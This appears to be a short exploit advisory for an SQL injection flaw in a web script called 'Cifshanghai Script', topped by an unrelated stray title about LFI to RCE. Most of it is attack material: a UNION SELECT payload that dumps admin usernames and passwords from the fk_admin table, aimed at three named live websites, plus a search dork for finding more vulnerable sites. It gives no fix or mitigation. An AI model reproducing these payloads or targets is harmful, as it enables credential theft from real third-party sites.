LFI to RCE via access_log injection

Cifshanghai Script SQL Injection Vuln

[o] Cifshanghai Script SQL Injection Vulnerability
Software : Cifshanghai Script
Vendor : http://www.
cifshanghai.com/
Author : NoGe


[o] Vulnerable file
new.php


[o] Exploit
http://localhost/[path]/new.php?id=[SQL]


[o] Proof Of Concept
http://www.feidamotohelmet.com/new.php?id=-26%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(name,0x3a,password),8%20from%20fk_admin--


[o] Dork
"Powered by cifshanghai"


[o] Note
this is a private script


Comments